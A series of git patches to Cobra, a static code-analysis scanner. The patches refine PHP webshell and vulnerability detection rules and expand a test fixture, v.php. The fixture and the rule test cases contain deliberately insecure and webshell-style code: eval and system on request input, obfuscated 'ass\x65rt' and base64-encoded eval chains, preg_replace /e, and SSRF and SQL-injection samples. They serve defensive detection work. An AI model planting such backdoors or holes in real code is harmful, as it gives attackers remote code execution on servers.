00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 17:28:14 +0800 Subject: [PATCH 21/29] Merge branch 'master' of github.com:braveghz/cobra # Conflicts: # rules/CVI-220001.xml # rules/CVI-360004.xml # rules/CVI-360005.xml # rules/CVI-360007.xml # rules/CVI-360012.xml # rules/CVI-360020.xml # rules/CVI-360021.xml # tests/vulnerabilities/webshell.php --- rules/CVI-360007.xml | 1 + rules/CVI-360012.xml | 9 +++++++-- rules/CVI-360013.xml | 2 +- rules/CVI-360014.xml | 2 +- rules/CVI-360015.xml | 8 +++++++- rules/CVI-360020.xml | 5 +++-- rules/CVI-360021.xml | 4 ++-- 7 files changed, 22 insertions(+), 9 deletions(-) diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 62b8cea4..af9e60a1 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml @@ -6,6 +6,7 @@ <level value="7"/> <test> <case assert="true"><![CDATA[call_user_func('assert', $arr);]]></case> + <case assert="true"><![CDATA[@array_map("ass\x65rt", (array) @$cmd);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml index 1bcd3f0d..04118bcb 100644 --- a/rules/CVI-360012.xml +++ b/rules/CVI-360012.xml @@ -2,15 +2,20 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell12"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,})]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w*)\s*=\s*@?create_function\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,})]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> + <case assert="true"><![CDATA[ + $func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));'); + $func($_GET['func']); + ]]></case> </test> <solution> ## 安全风险 代码中存在webshell + [webshell样例](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/php/b374k/b374k-2.4.poly.php) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml index 5f186e6e..e088828c 100644 --- a/rules/CVI-360013.xml +++ b/rules/CVI-360013.xml @@ -5,7 +5,7 @@ <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*(['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[$sa = "eval()"; create_function('xxx', $sa);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml index 4ef70460..463c4bf4 100644 --- a/rules/CVI-360014.xml +++ b/rules/CVI-360014.xml @@ -5,7 +5,7 @@ <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[$a = "eval";$a($_GET['a']);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml index df9048ae..0ad11515 100644 --- a/rules/CVI-360015.xml +++ b/rules/CVI-360015.xml @@ -5,7 +5,13 @@ <match mode="regex-only-match"><![CDATA[sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\(]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { + sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); + } else { + echo 'Error opening sqlite db: ' . $sqliteerror;exit; + } + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360020.xml b/rules/CVI-360020.xml index 5ac17520..d3104888 100644 --- a/rules/CVI-360020.xml +++ b/rules/CVI-360020.xml @@ -2,10 +2,11 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell20"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))]]></match> + <match mode="regex-only-match"><![CDATA[array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\s*['\"])]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[array_walk($array, "eval");]]></case> + <case assert="true"><![CDATA[array_walk(xxx,base64_decode("ZXZhbA==");]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360021.xml b/rules/CVI-360021.xml index 350ae708..9d194db6 100644 --- a/rules/CVI-360021.xml +++ b/rules/CVI-360021.xml @@ -2,10 +2,10 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell21"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)|\w*)[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[$a = "ZXZhbA==";array_walk($array, base64_decode($a));]]></case> </test> <solution> ## 安全风险 From ca6336ef020e1784a1a12131fc3bcf1aa7e987c5 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 17:29:12 +0800 Subject: [PATCH 22/29] v.php --- tests/vulnerabilities/v.php | 244 ++++++++++++++++++++++++++---------- 1 file changed, 175 insertions(+), 69 deletions(-) diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index 5e597b1d..1fae15ff 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -7,66 +7,63 @@ $cmd = $_REQUEST['a']; -echo($callback . ";"); +echo ($callback . ";"); +echo $callback; extract($cmd); -@array_map("ass\x65rt",(array)@$cmd); +@array_map("ass\x65rt", (array) @$cmd); $cmd = $_GET['cmd']; -if (!empty($cmd)){ - eval($cmd); - system('ls' + $cmd); +if (!empty($cmd)) { + eval($cmd); + system('ls'+$cmd); } if (isset($_GET['sid'])) { - setcookie("PHPSESSID", $cmd); + setcookie("PHPSESSID", $cmd); } phpinfo(); -if(!empty($url)) -{ - mkdir('log/'.date("Y"),0777); +if (!empty($url)) { + mkdir('log/' . date("Y"), 0777); } -function curl($url){ - $ch = curl_init(); - curl_setopt($ch, CURLOPT_URL, $url); - curl_setopt($ch, CURLOPT_HEADER, 0); - curl_exec($ch); - curl_close($ch); +// cvi-120001 +function curl($url) { + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_exec($ch); + curl_close($ch); } $url = $_GET['url']; -if (!empty($url)){ - curl($cmd); +if (!empty($url)) { + curl($cmd); } $url = $_GET['url']; -if (!empty($url)){ - $content = file_get_contents($url); +if (!empty($url)) { + $content = file_get_contents($url); } $url = $_GET["url"]; -if (!empty($url)){ - echo get_headers($url,1); +if (!empty($url)) { + echo get_headers($url, 1); } print("Hello " . $cmd); -$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; +$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; mysql_query($query); mysqli_query($query); - -if(!empty($cmd)){ - require_once($cmd); - - // 这种扫不出来 - require $cmd; +if (!empty($cmd)) { + require_once $cmd; } highlight_file($cmd); @@ -79,67 +76,176 @@ function curl($url){ $url = $_GET["url"]; if (!empty($url)) { - header("Location: ".$url); + header("Location: " . $url); } -$test = $_POST['test']; +$test = $_POST['test']; $test_uns = unserialize($test); -$xml = $_POST['xml']; +$xml = $_POST['xml']; $data = simplexml_load_string($xml); parse_str($_SERVER['QUERY_STRING']); $a = '0'; -if($a==1){ - echo "true!"; -}else{ - echo "false!"; +if ($a == 1) { + echo "true!"; +} else { + echo "false!"; } $file = $_POST["file_name"]; -if (!empty($file)){ - unlink($file); +if (!empty($file)) { + unlink($file); } - -header("Location: ".$_GET["url"]); +header("Location: " . $_GET["url"]); $host = $_POST['host']; $port = $_POST['port']; -function GetFile($host,$port,$link) -{ - $fp = fsockopen($host, intval($port), $errno, $errstr, 30); - if (!$fp) - { - echo "$errstr (error number $errno) \n"; - } - else - { - $out = "GET $link HTTP/1.1\r\n"; - $out .= "Host: $host\r\n"; - $out .= "Connection: Close\r\n\r\n"; - $out .= "Connection: Close\r\n\r\n"; - $out .= "\r\n"; - fwrite($fp, $out); - $contents=''; - while (!feof($fp)) - { - $contents.= fgets($fp, 1024); - } - fclose($fp); - return $contents; - } +function GetFile($host, $port, $link) { + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + if (!$fp) { + echo "$errstr (error number $errno) \n"; + } else { + $out = "GET $link HTTP/1.1\r\n"; + $out .= "Host: $host\r\n"; + $out .= "Connection: Close\r\n\r\n"; + $out .= "Connection: Close\r\n\r\n"; + $out .= "\r\n"; + fwrite($fp, $out); + $contents = ''; + while (!feof($fp)) { + $contents .= fgets($fp, 1024); + } + fclose($fp); + return $contents; + } } +//cvi-165001 +$surname = $_GET['surname']; +$filter = "(sn=" . $surname . ")"; +$sr = ldap_search($ds, "o=My Company, c=US", $filter); +$info = ldap_get_entries($ds, $sr); + +//cvi-360001 +include "sss.jpg"; + +//cvi-360037 +$a = "http://www.test.com/sss.php"; +require_once $a; + +//cvi-360002 +array_filter($arr, base64_decode("ZXZhbA==")); + +//cvi-360003 +$e = "eval"; +array_filter($arr, $e); + +//cvi-360004 +echo @preg_replace('/xx/e', $_POST[sss], axxa); + +//cvi-360005 +($e = $_POST['e']) && @preg_replace($e, "eval", 'hello'); + +//cvi-360006 +($code = $_POST['code']) && @preg_replace('/ad/e', '@' . str_rot13('riny') .'($code)', 'add'); + +//cvi-360007 +//call_user_func('assert', $_REQUEST['pass']); //这种和参数可控重复 同理加密的字符串检测不出来 +//call_user_func('assert', $arr); + +//cvi-360008 +$a = 'assert'; +call_user_func($a, $arr); + +//cvi-360009 +$db = new SQLite3('sqlite.db3'); +$db->createFunction('myfunc', $_POST['e']); + +//cvi-360010 +$e = $_REQUEST['e']; +$db = new SQLite3('sqlite.db3'); +$db->createFunction('myfunc', $e); +$stmt = $db->prepare("SELECT myfunc(?)"); +$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); +$stmt->execute(); + +//cvi-360011 +$sa = create_function('xxx', "eval()");$sa(); + +//cvi-360012 +$func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));');$func($_GET['func']); + +//cvi-360013 +//$id = $_GET['id'];$q = 'echo' . $id . 'is' . $a . ";";$sy = create_function('$a', $q); +$sa = "eval()"; create_function('xxx', $sa); + +//cvi-360014 +$a = "eval";$a($_GET['a']); + +//cvi-360015 感觉有误报的 +if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { + sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); +} else { + echo 'Error opening sqlite db: ' . $sqliteerror;exit; +} + +//cvi-360016 +filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); + +//cvi-360017 +$op = array('options' => 'assert'); +filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); + +//cvi-360018 +mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); + +//cvi-360019 +$e = "\ise"; +$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/", "", $data, $e); + +//cvi-360020 +array_walk($array, "eval"); + +//cvi-360021 +$a = "ZXZhbA==";array_walk($array, base64_decode($a)); + +//cvi-360022 +ini_set('allow_url_include, 1'); // Allow url inclusion in this script +include 'php://input'; + +//cvi-360026 +$cb = 'system'; +ob_start($cb); +echo $_GET[c]; +ob_end_flush(); + +//cvi-360028 +eval(base64_decode( +ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); + +//cvi-360032 +//<div class = bartitle><h4> '.sh_name().' </h4> .:r57 . bizDq99Shell:.</div> + +//cvi-360033 +$shver = "Emp3ror Undetectable #18"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("N3tsh_surl"); + $surl = ""; +} elseif (!empty($set_surl)) {$surl = $set_surl; + setcookie("N3tsh_surl", $surl);} else { $surl = $_REQUEST["N3tsh_surl"];} //Set this cookie for manual SURL -$surname=$_GET['surname']; -$filter = "(sn=" . $surname . ")"; -$sr=ldap_search($ds, "o=My Company, c=US", $filter); -$info = ldap_get_entries($ds, $sr); +//cvi-360034 +$_POST['sa']($_POST['sb']); +//cvi-360035 +$func = new ReflectionFunction($_GET[m]); +echo $func->invokeArgs(array($_GET[c], $_GET[id])); -$redis = new Redis(); -$redis->connect('192.168.1.2', 6379); -$redis->auth('passwd123!#'); \ No newline at end of file +//cvi-360036 +$a = 'assert'; +$arr = new ArrayObject(array('test', $_REQUEST['pass'])); +$arr->uasort($a); From 9da743d9921f7b4382565b47f0148d15240c2bbb Mon Sep 17 00:00:00 2001 From: BlBana <635373043@qq.com> Date: Thu, 7 Sep 2017 17:54:14 +0800 Subject: [PATCH 23/29] fixed two bugs --- cobra/engine.py | 6 ++++-- cobra/parser.py | 2 +- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/cobra/engine.py b/cobra/engine.py index 84caa107..8efa2bbf 100644 --- a/cobra/engine.py +++ b/cobra/engine.py @@ -522,7 +522,7 @@ def is_annotation(self): - Java: :return: boolean """ - match_result = re.findall(r"(#|\\\*|\/\/)+", self.code_content) + match_result = re.findall(r"^(#|\\\*|\/\/)+", self.code_content) # Skip detection only on match if self.is_match_only_rule(): return False @@ -620,9 +620,11 @@ def scan(self): if self.file_path[-3:].lower() == 'php': try: ast = CAST(self.rule_match, self.target_directory, self.file_path, self.line_number, self.code_content) + rule_repair = [] if self.rule_match_mode == const.mm_function_param_controllable: rule_match = self.rule_match.strip('()').split('|') # 漏洞规则整理为列表 - rule_repair = self.rule_repair.strip('()').split('|') # 修复规则整理为列表 + if self.rule_repair is not None: + rule_repair = self.rule_repair.strip('()').split('|') # 修复规则整理为列表 logger.debug('[RULE_MATCH] {r}'.format(r=rule_match)) try: with open(self.file_path, 'r') as fi: diff --git a/cobra/parser.py b/cobra/parser.py index 39c0f04a..7d17f481 100644 --- a/cobra/parser.py +++ b/cobra/parser.py @@ -135,7 +135,7 @@ def get_binaryop_params(node): # 当为BinaryOp类型时,分别对left和righ if isinstance(node.right, php.Variable): params.append(node.right.name) - elif not isinstance(node.right, php.Variable) or not isinstance(node.left, php.Variable): # right不为变量时 + if not isinstance(node.right, php.Variable) or not isinstance(node.left, php.Variable): # right不为变量时 params_right = get_binaryop_deep_params(node.right, params) params_left = get_binaryop_deep_params(node.left, params) From 64386399b410f5e3a3338355457163626150668d Mon Sep 17 00:00:00 2001 From: BlBana <635373043@qq.com> Date: Fri, 8 Sep 2017 11:47:07 +0800 Subject: [PATCH 24/29] modified test case --- tests/test_parser.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tests/test_parser.py b/tests/test_parser.py index 222bcf10..be6c6ef7 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -21,8 +21,9 @@ code_contents = fi.read() sensitive_func = ['system'] +repairs = [] lineno = 7 def test_scan_parser(): - assert scan_parser(code_contents, sensitive_func, lineno) + assert scan_parser(code_contents, sensitive_func, lineno, repairs) From 7e857770fcd056dacb4847298c23e885932067bc Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Mon, 11 Sep 2017 10:11:06 +0800 Subject: [PATCH 25/29] improve rules --- rules/CVI-120001.xml | 20 +++++++++----------- rules/CVI-120002.xml | 8 ++++---- rules/CVI-120003.xml | 1 - rules/CVI-120004.xml | 4 ++-- rules/CVI-140003.xml | 2 +- rules/CVI-140004.xml | 27 --------------------------- rules/CVI-160002.xml | 2 +- rules/CVI-160003.xml | 2 +- rules/CVI-160004.xml | 2 +- rules/CVI-167001.xml | 9 +-------- rules/CVI-180001.xml | 2 +- rules/CVI-181001.xml | 2 +- 12 files changed, 22 insertions(+), 59 deletions(-) delete mode 100644 rules/CVI-140004.xml diff --git a/rules/CVI-120001.xml b/rules/CVI-120001.xml index b469bb70..b0abf7d7 100644 --- a/rules/CVI-120001.xml +++ b/rules/CVI-120001.xml @@ -7,20 +7,19 @@ <level value="6"/> <test> <case assert="true"><![CDATA[ - function curl($url){ - $ch = curl_init(); - curl_setopt($ch, CURLOPT_URL, $url); - curl_setopt($ch, CURLOPT_HEADER, 0); - curl_exec($ch); - curl_close($ch); - } - $url = $_GET['url']; - curl($url); + function curl($url){ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_exec($ch); + curl_close($ch); + } + $url = $_GET['url']; + curl($url); ]]></case> </test> <solution> ## 安全风险 - SSRF漏洞(Server-Side Request Forgery) ### 形成原理 @@ -42,7 +41,6 @@ curl_exec($ch); curl_close($ch); } - $url = $_GET['url']; curl($url); ``` diff --git a/rules/CVI-120002.xml b/rules/CVI-120002.xml index 6fa20fb0..d6484be8 100644 --- a/rules/CVI-120002.xml +++ b/rules/CVI-120002.xml @@ -6,12 +6,12 @@ <level value="7"/> <test> <case assert="true"><![CDATA[ - $url = $_GET['url']; - echo file_get_contents($url); + $url = $_GET['url']; + echo file_get_contents($url); ]]></case> <case assert="false"><![CDATA[ - $url = "http://www.example.com"; - echo file_get_contents($url); + $url = "http://www.example.com"; + echo file_get_contents($url); ]]></case> </test> <solution> diff --git a/rules/CVI-120003.xml b/rules/CVI-120003.xml index 63b17a91..a2598623 100644 --- a/rules/CVI-120003.xml +++ b/rules/CVI-120003.xml @@ -3,7 +3,6 @@ <name value="get_headers导致的SSRF"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[get_headers]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,|preg_match(?:_all)?\s*\(\s*(?:.+?)\s*,\s*{{PARAM}}\s*[,\)]]]></repair> <level value="7"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-120004.xml b/rules/CVI-120004.xml index 340b9e8f..eb12d7ae 100644 --- a/rules/CVI-120004.xml +++ b/rules/CVI-120004.xml @@ -6,8 +6,8 @@ <level value="7"/> <test> <case assert="true"><![CDATA[ - $host = $_GET['host']; - $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + $host = $_GET['host']; + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); ]]></case> </test> <solution> diff --git a/rules/CVI-140003.xml b/rules/CVI-140003.xml index 0b3fe9dd..2ab2f550 100644 --- a/rules/CVI-140003.xml +++ b/rules/CVI-140003.xml @@ -3,7 +3,7 @@ <name value="直接输出入参可能导致XSS"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[(echo|print|print_r|exit|die|printf|vprintf|trigger_error|user_error|odbc_result_all|ovrimos_result_all|ifx_htmltbl_result)]]></match> - <repair block="in-function"><![CDATA[(htmlspecialchars\s*\(\s*{{PARAM}}\s*)]]></repair> + <repair block="in-function"><![CDATA[(htmlspecialchars]]></repair> <level value="4"/> <test> <case assert="true"><![CDATA[print_r ($_GET['test']);]]></case> diff --git a/rules/CVI-140004.xml b/rules/CVI-140004.xml deleted file mode 100644 index 7dd56c23..00000000 --- a/rules/CVI-140004.xml +++ /dev/null @@ -1,27 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="echo或print直接输出入参导致XSS"/> - <language value="php"/> - <match mode="regex-param-controllable"><![CDATA[(echo|print)\s*(\()?\s*.*\s*(,\s*.*)*(\))?;]]></match> - <repair block="in-function"><![CDATA[(htmlspecialchars\s*\(\s*{{PARAM}}\s*)]]></repair> - <level value="4"/> - <test> - <case assert="true"><![CDATA[echo ($_GET['test']);]]></case> - <case assert="true"><![CDATA[echo $_GET['test'];]]></case> - <case assert="true"><![CDATA[print("Hello " . $_GET["name"]);]]></case> - <case assert="true"><![CDATA[print 'foo is $_GET['test']';]]></case> - </test> - <solution> - ## 安全风险 - 直接输出入参会导致XSS - - ## 修复方案 - 1. 使用`htmlentities`函数进行转义 - ```php - print("Hello " . htmlentities($_GET["name"], ENT_QUOTES, "utf-8"); - ``` - 2. 使用Begis安全组件对参数进行过滤后使用 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-160002.xml b/rules/CVI-160002.xml index 2afb0fb7..c5ccc049 100644 --- a/rules/CVI-160002.xml +++ b/rules/CVI-160002.xml @@ -9,7 +9,7 @@ <case assert="false"><![CDATA[$query = "SELECT id FROM products LIMIT 20 ;";]]></case> <case assert="true"><![CDATA[$s = "select" + $v + "from " + $tb + "where id = " + $id;]]></case> <case assert="true"><![CDATA[ - $query = "SELECT id, name, inserted, size FROM products + $query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; diff --git a/rules/CVI-160003.xml b/rules/CVI-160003.xml index a869afb1..be45e4b9 100644 --- a/rules/CVI-160003.xml +++ b/rules/CVI-160003.xml @@ -3,7 +3,7 @@ <name value="MySQL Execute Functions可能导致SQL注入"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[(mysql_query|mysql_db_query)]]></match> - <repair block="in-function"><![CDATA[(?:mysql_real_escape_string|addslashes)\s*\(\s*{{PARAM}}\s*[\),]]]></repair> + <repair block="in-function"><![CDATA[(mysql_real_escape_string|addslashes)]]></repair> <level value="8"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-160004.xml b/rules/CVI-160004.xml index 487a30af..4a55e1a4 100644 --- a/rules/CVI-160004.xml +++ b/rules/CVI-160004.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="SQL Execute Functions可能导致SQL注入"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[(mysqli_query|pg_execute|pg_insert|pg_query|pg_select|pg_update|sqlite_query|msql_query|mssql_query|odbc_exec|fbsql_query|sybase_query|ibase_query|dbx_query|ingres_query|ifx_query|oci_parse|sqlsrv_query|maxdb_query|db2_exec)\s?\(]]></match> + <match mode="function-param-controllable"><![CDATA[(mysqli_query|pg_execute|pg_insert|pg_query|pg_select|pg_update|sqlite_query|msql_query|mssql_query|odbc_exec|fbsql_query|sybase_query|ibase_query|dbx_query|ingres_query|ifx_query|oci_parse|sqlsrv_query|maxdb_query|db2_exec)]]></match> <level value="8"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-167001.xml b/rules/CVI-167001.xml index 9e1d2a1f..353c9147 100644 --- a/rules/CVI-167001.xml +++ b/rules/CVI-167001.xml @@ -7,17 +7,13 @@ <level value="5"/> <test> <case assert="true"><![CDATA[ - <?php $xml = $_POST['xml']; $data = simplexml_load_string($xml); - ?> ]]></case> <case assert="false"><![CDATA[ - <?php $xml = $_POST['xml']; libxml_disable_entity_loader(true); $data = simplexml_load_string($xml); - ?> ]]></case> </test> <solution> @@ -42,18 +38,15 @@ ## 举例 ```php - <?php $xml = $_POST['xml']; $data = simplexml_load_string($xml); - ?> ``` 修改后代码 ```php - <?php $xml = $_POST['xml']; libxml_disable_entity_loader(true); $data = simplexml_load_string($xml); - ?> + ``` </solution> <status value="on"/> <author name="Lightless" email="root@lightless.me "/> diff --git a/rules/CVI-180001.xml b/rules/CVI-180001.xml index 5fdcee4c..676ab446 100644 --- a/rules/CVI-180001.xml +++ b/rules/CVI-180001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="远程代码执行"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)]]></match> + <match mode="function-param-controllable"><![CDATA[(array_map|create_function|call_user_func|call_user_func_array|assert|eval|dl|register_tick_function|register_shutdown_function|array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|array_walk_recursive|uasort|uksort|usort)]]></match> <level value="10"/> <test> <case assert="true"><![CDATA[array_map($_GET['pass'],$array);]]></case> diff --git a/rules/CVI-181001.xml b/rules/CVI-181001.xml index 0386083d..a2b8bde5 100644 --- a/rules/CVI-181001.xml +++ b/rules/CVI-181001.xml @@ -3,7 +3,7 @@ <name value="远程命令执行"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[(system|passthru|exec|pcntl_exec|shell_exec|popen|proc_open|ob_start|expect_popen|mb_send_mail|w32api_register_function|w32api_invoke_function|ssh2_exec)]]></match> - <repair block="in-function"><![CDATA[escapeshellcmd\s*\(\s*(.+?)\s*\)|escapeshellarg\s*\(\s*(.+?)\s*\)]]></repair> + <repair block="in-function"><![CDATA[(escapeshellcmd|escapeshellarg)]]></repair> <level value="10"/> <test> <case assert="true"><![CDATA[system($_GET['pass']);]]></case> From 8f5c8aae9653f3153944ba2abc268b290f7d1239 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Mon, 11 Sep 2017 11:54:49 +0800 Subject: [PATCH 26/29] improve rules --- rules/CVI-210001.xml | 2 +- rules/CVI-260001.xml | 2 +- rules/CVI-320002.xml | 12 +++++----- rules/CVI-350001.xml | 2 +- rules/CVI-360001.xml | 2 +- rules/CVI-360002.xml | 2 +- rules/CVI-360015.xml | 25 ------------------- rules/CVI-360023.xml | 16 ------------- rules/CVI-360024.xml | 19 --------------- rules/CVI-360025.xml | 19 --------------- rules/CVI-360027.xml | 2 +- rules/CVI-360029.xml | 12 ++++++++++ rules/CVI-360030.xml | 8 +++++++ rules/CVI-360033.xml | 2 +- tests/vulnerabilities/v.php | 48 ++++++++++++++++++------------------- 15 files changed, 57 insertions(+), 116 deletions(-) delete mode 100644 rules/CVI-360015.xml delete mode 100644 rules/CVI-360023.xml delete mode 100644 rules/CVI-360024.xml delete mode 100644 rules/CVI-360025.xml diff --git a/rules/CVI-210001.xml b/rules/CVI-210001.xml index 20af97e9..c93be764 100644 --- a/rules/CVI-210001.xml +++ b/rules/CVI-210001.xml @@ -3,7 +3,7 @@ <name value="未经验证的任意链接跳转"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[header]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> + <repair block="in-function-up"><![CDATA[in_array]]></repair> <level value="5"/> <test> <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> diff --git a/rules/CVI-260001.xml b/rules/CVI-260001.xml index 9ca64e81..fdc5186f 100644 --- a/rules/CVI-260001.xml +++ b/rules/CVI-260001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name 